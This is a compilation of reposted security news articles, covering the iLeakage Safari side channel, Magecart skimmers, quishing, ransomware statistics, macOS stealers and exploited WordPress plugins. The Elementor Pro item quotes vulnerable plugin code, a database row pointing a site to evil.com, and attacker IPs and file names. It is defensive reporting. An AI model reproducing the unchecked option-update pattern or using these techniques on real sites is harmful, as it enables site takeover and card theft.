Hackers can force iOS and macOS browsers to divulge passwords and much more

iLeakage is practical and requires minimal resources. A patch isn’t (yet) available.

Researchers have devised an attack that forces Apple’s Safari browser to divulge passwords, Gmail message content, and other secrets by exploiting a side channel vulnerability in the A- and M-series CPUs running modern iOS and macOS devices.

iLeakage, as the academic researchers have named the attack, is practical and requires minimal resources to carry out. It does, however, require extensive reverse-engineering of Apple hardware and significant expertise in exploiting a class of vulnerability known as a side channel, which leaks secrets based on clues left in electromagnetic emanations, data caches, or other manifestations of a targeted system. The side channel in this case is speculative execution, a performance enhancement feature found in modern CPUs that has formed the basis of a widecorpus of attacks in recent years. The nearly endless stream of exploit variants has left chip makers—primarily Intel and, to a lesser extent, AMD—scrambling to devise mitigations.

Exploiting WebKit on Apple silicon

The researchers implement iLeakage as a website. When visited by a vulnerable macOS or iOS device, the website uses JavaScript to surreptitiously open a separate website of the attacker’s choice and recover site content rendered in a pop-up window. The researchers have successfully leveraged iLeakage to recover YouTube viewing history, the content of a Gmail inbox—when a target is logged in—and a password as it’s being autofilled by a credential manager. (In an email sent five days after this post went live, a Google representative pointed out the obvious: the leakage is the result of the side-channel and WebKit behavior and Gmail is simply a hypothetical downstream target. There are no indications iLeakage has been exploited in the wild.)

Once visited, the iLeakage site requires about five minutes to profile the target machine and, on average, roughly another 30 seconds to extract a 512-bit secret, such as a 64-character string.

“We show how an attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution,” the researchers wrote on an informational website. “In particular, we demonstrate how Safari allows a malicious webpage to recover secrets from popular high-value targets, such as Gmail inbox content. Finally, we demonstrate the recovery of passwords, in case these are autofilled by credential managers.”

Top: Google’s accounts page autofilled by password manager, where the password is googlepassword. Bottom: Leaked page data with credentials highlighted.
Enlarge / Top: Google’s accounts page autofilled by password manager, where the password is googlepassword. Bottom: Leaked page data with credentials highlighted.kim, et al.

While iLeakage works against Macs only when running Safari, iPhones and iPads can be attacked when running any browser because they’re all based on Apple’s WebKit browser engine. An Apple representative said iLeakage advances the company’s understanding and that the company is aware of the vulnerability and plans to address it in an upcoming software release. There is no CVE designation to track the vulnerability.

Unique WebKit attributes are one crucial ingredient in the attack. The design of A-series and M-series silicon—the first generation of Apple-designed CPUs for iOS and macOS devices respectively—is the other. Both chips contain defenses meant to protect against speculative execution attacks. Weaknesses in the way those protections are implemented ultimately allowed iLeakage to prevail over them.

Source and more details: Hackers can force iOS and macOS browsers to divulge passwords and much more | Ars Technica

Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft

Threat hunters have discovered a rogue WordPress plugin that’s capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information.

The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.

“As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy,” security researcher Ben Martin said. “In this case, comments claim the code to be ‘WordPress Cache Addons.'”

Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site.

Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it’s automatically enabled and conceals its presence from the admin panel.

“Since the only way to remove any of the mu-plugins is by manually removing the file the malware goes out of its way to prevent this,” Martin explained. “The malware accomplishes this by unregistering callback functions for hooks that plugins like this normally use.”

The fraudulent also comes with an option to create and hide an administrator user account from the legitimate website admin to avoid raising red flags and have sustained access to the target for extended periods of time.

The ultimate objective of the campaign is to inject credit card stealing malware in the checkout pages and exfiltrate the information to an actor-controlled domain.

“Since many WordPress infections occur from compromised wp-admin administrator users it only stands to reason that they’ve needed to work within the constraints of the access levels that they have, and installing plugins is certainly one of the key abilities that WordPress admins possess,” Martin said.

The disclosure arrives weeks after the WordPress security community warned of a phishing campaign that warns users of an unrelated security flaw and tricks them into installing a plugin under the guise of a patch. The plugin, for its part, creates an admin user and deploys a web shell for persistent remote access.

Sucuri said that the threat actors behind the campaign are leveraging the “RESERVED” status associated with a CVE identifier, which happens when it has been reserved for use by a CVE Numbering Authority (CNA) or security researcher, but the details are yet to be filled.

Source and more details: https://thehackernews.com/2023/12/rogue-wordpress-plugin-exposes-e.html

Hackers modify online stores’ 404 pages to steal credit cards

A new Magecart card skimming campaign hijacks the 404 error pages of online retailer’s websites, hiding malicious code to steal customers’ credit card information.

This technique is one of the three variants observed by researchers of the Akamai Security Intelligence Group, with the other two concealing the code in the HTML image tag’s ‘onerror’ attribute and an image binary to make it appear as the Meta Pixel code snippet.

Akamai says the campaign focuses on Magento and WooCommerce sites, with some victims linked to renowned organizations in the food and retail sectors.

Manipulating 404 pages
All websites feature 404 error pages that are displayed to visitors when accessing a webpage that does not exist, has been moved, or has a dead/broken link.

The Magecart actors leverage the default ‘404 Not Found’ page to hide and load the malicious card-stealing code, which hasn’t been seen before in previous campaigns.

“This concealment technique is highly innovative and something we haven’t seen in previous Magecart campaigns,” reads Akamai’s report.

“The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion.”

The skimmer loader either disguises itself as a Meta Pixel code snippet or hides within random inline scripts already present on the compromised checkout web page.

The loader initiates a fetch request to a relative path named ‘icons,’ but as this path does not exist on the website, the request results in a “404 Not Found” error.

Akamai’s investigators initially assumed the skimmer was no longer active or the Magecart group had made a configuration mistake. However, upon closer inspection, they found that the loader contained a regular expression match searching for a specific string in the returned HTML of the 404 page.

Upon locating the string on the page, Akamai found a concatenated base64-encoded string concealed in a comment. Decoding that string revealed the JavaScript skimmer, which hides in all 404 pages.

“We simulated additional requests to nonexistent paths, and all of them returned the same 404 error page containing the comment with the encoded malicious code,” explains Akamai

“These checks confirm that the attacker successfully altered the default error page for the entire website and concealed the malicious code within it!”

Because the request is made to a first-party path, most security tools monitoring suspicious network requests on the checkout page would overlook it.

Stealing the data
The skimmer code displays a fake form that the website visitors are expected to fill out with sensitive details, including their credit card number, expiration date, and security code.

Once this data is entered on the bogus form, the victim gets a fake “session timeout” error.

In the background, all information is base64-encoded and sent to the attacker via an image request URL carrying the string as a query parameter.

This approach helps evade detection by network traffic monitoring tools, as the request looks like a benign image fetch event. However, decoding the base64 string reveals personal and credit card information.

The case of manipulating 404 pages highlights the evolving tactics and versatility of Magecart actors, who continually make it harder for webmaster to locate their malicious code on compromised websites and sanitize them.

Source and more details: https://www.bleepingcomputer.com/news/security/hackers-modify-online-stores-404-pages-to-steal-credit-cards/

Quishing is the new phishing, experts warn – here’s how not to get hooked

Experts are warning of the latest cyber threat to smartphone users – quishing.

Quishing uses the humble QR code to carry out a phishing attack, usually either to trick people into revealing sensitive information or infecting devices with malware.

In 2019, the QR code – short for quick response – was all but extinct. Invented in 1994 to track vehicles during manufacturing in Japan, they had slowly spread across the globe and were expected to take off in an increasingly digital world.

However, even after Apple gave the iPhone a QR code scanner in 2017 they were still far from ubiquitous – until Covid arrived, and suddenly we were scanning them left, right and centre to prove we were virus-free or get into restaurants.

With the habit still strong and QRs everywhere from loyalty cards to adverts on the bus, cyber criminals are jumping on the bandwagon.

‘Everyone with a smartphone happily scans a QR code, whether that be at a restaurant or museum or even to tip buskers on the street,’ said quishing expert Tim Callan, chief experience officer at technology firm Sectigo. ‘While QR codes do have their benefit, their rising popularity means they have also entered into the cybercriminals’ arsenal of weapons. 

‘It is worryingly easy for bad actors to falsify links and addresses. A bad QR code could infect your device or make you click on a link to a dangerous website.’

To avoid falling for a quishing scam, Mr Callan recommends avoiding QRs you can’t fully trust.

‘To avoid quishing scams users shouldn’t scan any QR codes where you cannot easily verify the identity of the end user,’ he said. ‘Think carefully before scanning QR codes in public places, such as for promotional posters, stickers and adverts. Consider instead looking up the organisation directly through a secure browser. 

‘Treat what you see in sites you access through unsolicited QR codes with a grain of salt, and be very careful about installing software or sharing information on the sites they link to.’

However, it is not just QR codes in public places that cannot be trusted. Scammers and hackers can also send them direct to your inbox – bypassing any virus protection you may have in place.

‘This innovative approach serves as a warning sign to organisations as well as the general public, reminding us of the importance of staying vigilant and informed in the face of emerging cyber threats,’ said Raluca Saceanu, CEO of Smarttech247.

‘The modus operandi of [a recent major] recent attack involves phishing emails posing as urgent Microsoft 365 account updates. These quishing emails feature PNG or PDF attachments containing QR codes, which recipients are prompted to scan to purportedly verify their accounts within a tight timeframe of 2-3 days. 

‘The clever use of QR codes embedded in images enabled attackers to bypass email security scans for known malicious links, ultimately reaching the target’s inbox.’

Ms Saceanu warns anyone who receives a QR code via email to be cautious, especially if the message stresses urgency. Cyber criminals often succeed by generating a sense of panic in their victims, so people act quickly without checking.

She adds to always verify the source of the email – remember, even though at first glance it may appear legitimate, cyber criminals can easily spoof email address. Look at the address itself, not just the name of the sender. Even if that appears believable, a quick search of the address may highlight anything untoward. Compare the style of the email address given with those you have previously received from the company or you can see online. 

For example, the courier Evri – formerly Hermes – makes clear on its website any contact from its UK arm will come from addresses ending @evri.com, @hermes-europe.co.uk or @myhermes.co.uk, but a recent scam warning of an unsuccessful package delivery came from shipping@hermescourierexpress.com. 

However, while cyber criminals are trying to use smartphones as a vehicle to personal information, your device is also a line of defence.

‘Your smartphone can be your ally in this battle,’ said Ms Saceanu. ‘Most QR code scanners will prompt you to confirm the destination URL before opening a browser, adding an extra layer of security. 

‘Keep your smartphone’s operating system and apps up to date to ensure you have the latest security patches.’

And remember. Check, then double-check. Be sure you know what you’re clicking on before hitting the button.

Source: Quishing is the new phishing, experts warn – here’s how to stay safe | Tech News | Metro News

RANSOMWARE DWELL TIME HITS LOW OF 24 HOURS

Analysis from Secureworks annual State of The Threat Report shows ransomware median dwell time has dropped from 4.5 days to less than 24 hours in a year

Atlanta, GA, October 5, 2023: Ransomware is being deployed within one day of initial access in more than 50% of engagements, says Secureworks® (NASDAQ: SCWX) Counter Threat Unit™ (CTU™). In just 12 months the median dwell time identified in the annual Secureworks State of the Threat Report has freefallen from 4.5 days to less than one day. In 10% of cases, ransomware was even deployed within five hours of initial access.

“The driver for the reduction in median dwell time is likely due to the cybercriminals’ desire for a lower chance of detection. The cybersecurity industry has become much more adept at detecting activity that is a precursor to ransomware. As a result, threat actors are focusing on simpler and quicker to implement operations, rather than big, multi-site enterprise-wide encryption events that are significantly more complex. But the risk from those attacks is still high,” said Don Smith, VP Threat Intelligence, Secureworks Counter Threat Unit.

“While we still see familiar names as the most active threat actors, the emergence of several new and very active threat groups is fuelling a significant rise in victim and data leaks. Despite high profile takedowns and sanctions, cybercriminals are masters of adaptation, and so the threat continues to gather pace,” Smith continued.

The annual State of the Threat report examines the cybersecurity landscape from June 2022 to July 2023. Key findings include:

  • While some familiar names including GOLD MYSTIC (LockBit), GOLD BLAZER (BlackCat/ALPV), and GOLD TAHOE (Cl0p) still dominate the ransomware landscape, new groups are emerging and listing significant victim counts on “name and shame” leak sites. The past four months of this reporting period have been the most prolific for victim numbers since name-and-shame attacks started in 2019.
  • The three largest initial access vectors (IAV) observed in ransomware engagements where customers engaged Secureworks incident responders were: scan-and-exploit, stolen credentials and commodity malware via phishing emails.
  • Exploitation of known vulnerabilities from 2022 and earlier continued and accounted for more than half of the most exploited vulnerabilities during the report period.

Most Active Ransomware Groups

The same threat groups continued to dominate in 2023 as in 2022. GOLD MYSTIC’s LockBit remains the head of the pack, with nearly three times the number of victims as the next most active group, BlackCat, operated by GOLD BLAZER.

New schemes have also emerged and posted numerous victims. MalasLocker, 8BASE and Akira (which ranked at number 14) are all newcomers that made an impact from Q2 2023. 8BASE listed nearly 40 victims on its leak site in June 2023, only slightly fewer than LockBit. Analysis shows that some of the victims go back as far as mid 2022, although they were dumped at the same time. MalasLocker’s attack on Zimbra servers from the end of April 2023 accounted for 171 victims on its leak site in May. The report examines what leak site activity actually reveals about ransomware attack success rates — it’s not as straightforward as it seems.

The report also reveals that victim numbers per month from April-July 2023 were the most prolific since name and shame emerged in 2019. The highest number of monthly victims ever was posted to leak sites in May 2023 with 600 victims, three times as many as in May 2022.

Top Initial Access Vectors for Ransomware

The three largest initial access vectors (IAV) observed in ransomware engagements where customers engaged Secureworks incident responders were: scan-and-exploit (32%), stolen credentials (32%) and commodity malware via phishing emails (14%).

Scan-and-exploit involves the identification of vulnerable systems, potentially via a search engine like Shodan or a vulnerability scanner, and then attempting to compromise them with a specific exploit. Within the top 12 most commonly exploited vulnerabilities, 58% have CVE dates of earlier than 2022. One (CVE-2018-13379) also made the top 15 most routinely exploited list in 2021 and 2020.

“Despite much hype around ChatGPT and AI style attacks, the two highest profile attacks of 2023 thus far were the result of unpatched infrastructure. At the end of the day, cybercriminals are reaping the rewards from tried and tested methods of attack, so organizations must focus on protecting themselves with basic cyber hygiene and not get caught up in hype,” Smith continued.

The World of Nation-State Attackers

The report also examines the significant activities and trends in the behavior of state-sponsored threat groups belonging to China, Russia, Iran, and North Korea. Geopolitics remains the primary driver for state-sponsored threat groups across the board.

China:

China has shifted part of its attention to Eastern Europe, while also maintaining a focus on Taiwan and other near neighbors. It displays a growing emphasis on stealthy tradecraft in cyberespionage attacks — a change from its previous “smash-and-grab” reputation. The use of commercial tools like Cobalt Strike, as well as Chinese open-source tooling, minimizes risk of attribution and blends with activity from post-intrusion ransomware groups.

Iran:

Iran remains focused on dissident activity, on hindering progress on the Abraham Accords, and on Western intentions towards renegotiations of nuclear accords. Iran’s main intelligence services — the Ministry of Intelligence and Security (MOIS or VAJA) and the Islamic Revolutionary Guard Corp (IRGC) — both use a network of contractors to support offensive cyber strategies. The use of personas (impersonating real people or fake created people) is a key tactic across Iranian threat groups.

Russia:

The war in Ukraine remained the focus for Russian activity. This falls into two camps; cyberespionage and disruption. This year has seen an increase in the amount of patriotic-minded cyber groups targeting organizations considered adversaries of Russia. For gangs, Telegram is the social media/messaging platform of choice for recruitment, targeting and celebrations of success. The malicious use of trusted third-party cloud services is frequently incorporated into Russian threat group operations.

North Korea:

North Korea threat groups fall into two groups: cyber espionage and revenue generation for the isolated regime. AppleJeus has been a fundamental tool for North Korea’s financial theft initiatives, and according to Elliptic, North Korean threat groups have stolen $2.3 billion USD in crypto assets between May 2017 and May 2023 (30% of this from Japan).

State of the Threat Report 2023

This latest State of the Threat Report is the seventh annual report from Secureworks providing a concise analysis of how the global cybersecurity threat landscape has evolved over the last 12 months. The information within the report is drawn from the Secureworks Counter Threat Unit’s (CTU) firsthand observations of threat actor tooling and behaviors and includes real-life incidents. Our annual threat analysis provides a deep dive insight into the threats our team has observed on the front line of cybersecurity.

The Secureworks State of the Threat Report can be read in full here: https://www.secureworks.com/resources/rp-state-of-the-threat-2023

Source: https://www.secureworks.com/about/press/ransomware-dwell-time-hits-low-of-24-hours

WordPress Plugin WP-UserOnline 2.88.0 – Stored Cross Site Scripting (XSS)

Technical Description:
The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions 
up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do 
not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, 
with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user 
accesses the injected page.

Source: https://www.exploit-db.com/exploits/51020

Massive Targeted Exploit Campaign Against WooCommerce Payments Underway

The Wordfence Threat Intelligence team has been monitoring an ongoing exploit campaign targeting a recently disclosed vulnerability in WooCommerce Payments, a plugin installed on over 600,000 sites. Large-scale attacks against the vulnerability, assigned CVE-2023-28121, began on Thursday, July 14, 2023 and continued over the weekend, peaking at 1.3 million attacks against 157,000 sites on Saturday, July 16, 2023.

The exploit allows unauthenticated attackers to obtain administrative privileges on vulnerable websites, rating it a Critical CVSS score of 9.8. This makes it an appealing target, and this attack campaign confirms the original coverage of the vulnerability that predicted large-scale attacks.

All Wordfence users have been protected against this vulnerability since April 22, 2023 via a Firewall rule we developed to block exploit attempts. Versions 4.8.0 – 5.6.1 of the WooCommerce Payments plugin are vulnerable.

The Wordfence Intelligence Dashboard showing attacks against WooCommerce Payments

Readers can continue watching this and other trends on the Wordfence Intelligence dashboard, where it is currently the most heavily-attacked unique WordPress vulnerability.

Unlike many other large-scale campaigns which typically attack millions of sites indiscriminately, this one seems to be targeted against a smaller set of websites. What’s particularly interesting is that we began seeing early warning signs several days before the main wave of attacks – an increase in plugin enumeration requests searching for a readme.txt file in the wp-content/plugins/woocommerce-payments/ directory of millions of sites.

Source and more details: https://www.wordfence.com/blog/2023/07/massive-targeted-exploit-campaign-against-woocommerce-payments-underway/

New Atomic macOS Malware Steals Keychain Passwords and Crypto Wallets

Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer.

“The Atomic macOS Stealer can steal various types of information from the victim’s machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and even the macOS password,” Cyble researchers said in a technical report.

Among other features include its ability to extract data from web browsers and cryptocurrency wallets like Atomic, Binance, Coinomi, Electrum, and Exodus. Threat actors who purchase the stealer from its developers are also provided a ready-to-use web panel for managing the victims.

The malware takes the form of an unsigned disk image file (Setup.dmg) that, when executed, urges the victim to enter their system password on a bogus prompt to escalate privileges and carry out its malicious activities — a technique also adopted by MacStealer.

The initial intrusion vector used to deliver the malware is immediately not clear, although it’s possible that users are manipulated into downloading and executing it under the guise of legitimate software.

The Atomic stealer artifact, submitted to VirusTotal on April 24, 2023, also bears the name “Notion-7.0.6.dmg,” suggesting that it’s being propagated as the popular note-taking app. Other samples unearthed by the MalwareHunterTeam have been distributed as “Photoshop CC 2023.dmg” and “Tor Browser.dmg.”

“Malware such as the Atomic macOS Stealer could be installed by exploiting vulnerabilities or hosting on phishing websites,” Cyble noted.

Atomic then proceeds to harvest system metadata, files, iCloud Keychain, as well as information stored in web browsers (e.g., passwords, autofill, cookies, credit card data) and crypto wallet extensions, all of which are compressed into a ZIP archive and sent to a remote server. The ZIP file of the compiled information is then sent to pre-configured Telegram channels.

The development is another sign that macOS is increasingly becoming a lucrative target beyond nation-state hacking groups to deploy stealer malware, making it imperative that users only download and install software from trusted sources, enable two-factor authentication, review app permissions, and refrain from opening suspicious links received via emails or SMS messages.

Second Variant of Atomic Stealer Found

SentinelOne, in a follow-up analysis published earlier this week, disclosed details of a previously unreported second variant of Atomic Stealer and the use of Google Ads as a distribution vector for the malware.

The new version masquerades as a game installer and incorporates a “larger number of functions focusing on Firefox and Chromium browsers” but at the same time leverages game-related lures to target cryptocurrency users.

Additionally, the presence of grammatical and spelling errors is an indication that the developer’s first language is likely not English. The identity of the threat actor behind Atomic Stealer is currently unknown.

Another significant trait of Atomic Stealer is its lack of persistence mechanism due to a macOS Ventura feature that alerts users when new apps or services are added to the list of “login items” that are automatically executed when the device starts. Instead, it opts to steal as much information as possible in what’s a smash-and-grab attack.

“Infostealers targeted at Mac users have become increasingly viable for threat actors now that Macs have reached widespread use in organizations, both for work and personal use,” SentinelOne researcher Phil Stokes said.

“As many Mac devices lack good external security tools that can provide both visibility and protection, there is plenty of opportunity for threat actors to develop and market tools to aid cybercriminals.”

This vicious new malware version is now targeting password managers

A new version of an already active malware is now shifting focus to target 1Password – in our view the best password manager for families – and KeePass.

ViperSoftX is an infostealer that has already been after crypto wallets, but its now attacking more of them, in addition to multiple web browsers – not just Google Chrome – and password managers as well. 

It also has stronger code encryption now and is better at avoiding detection from antivirus tools. 

New version

ViperSoftX can install the malicious Chrome extension VenomSoftX, but according to security researchers Trend Micro, it can now also infect Microsoft Edge, Mozilla Firefox, Opera and Brave. 

The malware was first discovered in 2020 stealing crypto currency using a JavaScript-based RAT (remote access trojan). By 2022, however, Avast found that it had advanced considerably in its capabilities, with the cybersecurity vendor claiming that it had stopped close to 100,000 attacks on its customers from the malware through most of last year. Most victims were based in the U.S., Italy, Brazil, and India.

It seems that now, however, ViperSoftX has extended its global reach, with Trend Micro detecting additional prominent activity in Australia, Japan, Taiwan, Malaysia and France. Enterprises and consumers alike are being targeted too. Analysts found that the malware is often hidden in software cracks and activators. 

In addition to attacking many more crypto wallets now, the latest version of ViperSoftX has been found by Trend Micros to be scouring for files associated with 1Password and KeePass, and attempting to steal data related to their browser extensions. 

An exploit tracked as CVE-2023-24055 does allow for stored passwords to be exported in a plain text file, but Trend Micro found now evidence that this is being used by ViperSoftX.

However, it told BleepingComputer that it could steal users’ vaults in the later stages of the attack, once the malware has taken hold and extracted data from the victim’s system and sent it to the threat actor.

More worringly, the new ViperSoftX uses DLL sideloading in order to be mistakenly recognized as a trusted process, thus remaining undetected by security software. It also checks to see if monitoring tools like VMWare or Process Monitor and antivirus software such as Windows Defender and ESET are present on the system before it it begins its processes.

It also uses byte mapping, a technique to encrypt its code in a way that makes it much harder to decrypt without having the correct map to do so.

Source: This vicious new malware version is now targeting password managers | TechRadar

Hackers exploit WordPress plugin flaw that gives full control of millions of sites

Elementor Pro fixed the vulnerability, but not everyone has installed the patch.

Hackers are actively exploiting a critical vulnerability in a widely used WordPress plugin that gives them the ability to take complete control of millions of sites, researchers said.

The vulnerability, which carries a severity rating of 8.8 out of a possible 10, is present in Elementor Pro, a premium plugin running on more than 12 million sites powered by the WordPress content management system. Elementor Pro allows users to create high-quality websites using a wide range of tools, one of which is WooCommerce, a separate WordPress plugin. When those conditions are met, anyone with an account on the site—say a subscriber or customer—can create new accounts that have full administrator privileges.

The vulnerability was discovered by Jerome Bruandet, a researcher with security firm NinTechNet. Last week, Elementor, the developer of the Elementor Pro plugin, released version 3.11.7, which patched the flaw. In a post published on Tuesday, Bruandet wrote:

An authenticated attacker can leverage the vulnerability to create an administrator account by enabling registration (users_can_register) and setting the default role (default_role) to “administrator”, change the administrator email address (admin_email) or, as shown below, redirect all traffic to an external malicious website by changing siteurl among many other possibilities:

MariaDB [example]> SELECT * FROM `wp_options` WHERE `option_name`='siteurl';
+-----------+-------------+------------------+----------+
| option_id | option_name | option_value     | autoload |
+-----------+-------------+------------------+----------+
|		 1 | siteurl     | https://evil.com | yes 	 |
+-----------+-------------+------------------+----------+
1 row in set (0.001 sec)

Now, researchers with a separate security firm, PatchStack, report that the vulnerability is under active exploitation. Attacks are coming from a variety of IP addresses, including:

  • 193.169.194.63
  • 193.169.195.64
  • 194.135.30.6

Files uploaded to compromised sites often have the following names:

  • wp-resortpack.zip
  • wp-rate.php
  • lll.zip

URLs of compromised sites are often being changed to:

  • away[dot]trackersline[dot]com

The broken access control vulnerability stems from Elementor Pro’s use of the “elementor-pro/modules/woocommerce/module.php” component. When WooCommerce is running, this script registers the following AJAX actions:

/**
 * Register Ajax Actions.
 *
 * Registers ajax action used by the Editor js.
 *
 * @since 3.5.0
 *
 * @param Ajax $ajax
 */
public function register_ajax_actions( Ajax $ajax ) {
   // `woocommerce_update_page_option` is called in the editor save-show-modal.js.
   $ajax->register_ajax_action( 'pro_woocommerce_update_page_option', [ $this, 'update_page_option' ] );
   $ajax->register_ajax_action( 'pro_woocommerce_mock_notices', [ $this, 'woocommerce_mock_notices' ] );
}

and

/**
 * Update Page Option.
 *
 * Ajax action can be used to update any WooCommerce option.
 *
 * @since 3.5.0
 *
 * @param array $data
 */
public function update_page_option( $data ) {
   update_option( $data['option_name'], $data['editor_post_id'] );
}

The update_option function “is supposed to allow the Administrator or the Shop Manager to update some specific WooCommerce options, but user input aren’t validated and the function lacks a capability check to restrict its access to a high privileged user only,” Bruandet explained. He continued:

Elementor uses its own AJAX handler to manage most of its AJAX actions, including pro_woocommerce_update_page_option, with the global elementor_ajax action. It is located in the “elementor/core/common/modules/ajax/module.php” script of the free version (which is required to run Elementor Pro) :

/**
 * Handle ajax request.
 *
 * Verify ajax nonce, and run all the registered actions for this request.
 *
 * Fired by `wp_ajax_elementor_ajax` action.
 *
 * @since 2.0.0
 * @access public
 */
public function handle_ajax_request() {
   if ( ! $this->verify_request_nonce() ) {
  	$this->add_response_data( false, esc_html__( 'Token Expired.', 'elementor' ) )
     	->send_error( Exceptions::UNAUTHORIZED );
   }
   ...

Anyone using Elementor Pro should ensure they’re running 3.11.7 or later, as all previous versions are vulnerable. It’s also a good idea for these users to check their sites for the signs of infection listed in the PatchStack post.

Source: https://arstechnica.com/information-technology/2023/03/hackers-exploit-wordpress-plugin-flaw-that-gives-full-control-of-millions-of-sites